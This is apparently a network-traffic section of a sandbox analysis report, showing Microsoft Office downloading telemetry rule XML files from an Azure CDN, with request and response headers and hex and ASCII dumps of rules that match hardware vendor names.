                                                                                                                                                                                                                                                    2024-10-29 12:08:23 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    30192.168.2.54975413.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:23 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:23 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:23 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 477
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BB8CEAC16"
                                                                                                                                                                                                                                                    x-ms-request-id: 9a09e836-e01e-0052-3cae-26d9df000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120823Z-16849878b782d4lwcu6h6gmxnw000000065g000000008k3d
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:23 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    31192.168.2.54975513.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:23 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:23 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:23 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 464
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582B97FB6C3C"
                                                                                                                                                                                                                                                    x-ms-request-id: 860a7776-a01e-00ab-0afb-289106000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120823Z-r197bdfb6b48v72xb403uy6hns0000000720000000006hub
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:23 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    32192.168.2.54975313.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:23 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:23 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 415
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BA41997E3"
                                                                                                                                                                                                                                                    x-ms-request-id: 6484a1a6-201e-0000-75a3-26a537000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120823Z-16849878b78wc6ln1zsrz6q9w8000000062000000000frzm
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:23 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    33192.168.2.54975613.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:23 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:23 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:23 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 494
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BB7010D66"
                                                                                                                                                                                                                                                    x-ms-request-id: 78a5d0bc-501e-005b-6da6-26d7f7000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120823Z-16849878b78p8hrf1se7fucxk800000007dg0000000057x4
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:23 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    34192.168.2.54975813.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:24 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:24 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 472
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582B9DACDF62"
                                                                                                                                                                                                                                                    x-ms-request-id: 864201cb-901e-0015-2b18-26b284000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120824Z-16849878b78tg5n42kspfr0x4800000006kg000000004mx3
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:24 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    35192.168.2.54975713.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:24 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:24 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 419
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582B9748630E"
                                                                                                                                                                                                                                                    x-ms-request-id: bfc21b6c-401e-0067-2636-2809c2000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120824Z-15b8d89586fdmfsg1u7xrpfws00000000ang00000000acaf
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:24 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    36192.168.2.54975913.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:24 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:24 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 404
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                                                                                                                                    x-ms-request-id: 1abafd92-601e-0070-072b-27a0c9000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120824Z-16849878b786lft2mu9uftf3y400000007n000000000gkhg
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:24 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    37192.168.2.54976013.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:24 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:24 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582B9C8E04C8"
                                                                                                                                                                                                                                                    x-ms-request-id: ebbbec6e-b01e-0021-1c83-29cab7000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120824Z-17c5cb586f6sqz6fff89etrx0800000006a0000000002a2e
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:24 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    38192.168.2.54976113.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:24 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:24 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 428
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BAC4F34CA"
                                                                                                                                                                                                                                                    x-ms-request-id: 67fffc2c-401e-000a-5dae-264a7b000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120824Z-16849878b78z2wx67pvzz63kdg00000004zg00000000gdv4
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
